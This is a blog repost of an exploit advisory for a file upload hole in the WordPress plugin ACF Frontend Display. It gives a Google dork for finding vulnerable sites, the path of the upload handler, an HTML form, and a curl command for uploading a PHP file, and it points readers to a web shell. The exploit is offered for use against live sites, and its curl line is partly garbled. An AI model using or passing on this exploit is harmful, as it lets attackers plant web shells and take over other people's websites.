Sunday, February 19, 2017

WordPress Plugins ACF Frontend Display File Upload Vulnerability

WordPress Plugins ACF Frontend Display File Upload Vulnerability



#- Title: WordPress Plugins ACF Frontend Display File Upload Vulnerability
#- Author: TUNISIAN CYBER
#- Date: 2015-07-07
#- Developer : dadmor
#- Link Download : github. com/dadmor/ACF_frontend_display
#- Google Dork: inurl:"/plugins/acf-frontend-display/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --


Vulnerability : site/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php

When Vulnerable : Like jquery file upload

Method 

CSRF : 
<form method="POST" action="http://3xploi7.blogspot.com/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

With curl  :


curl -k -X POST -F "action=upload" -F "3xploi7.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"


Need Shell Path ? Click Here


Available link for download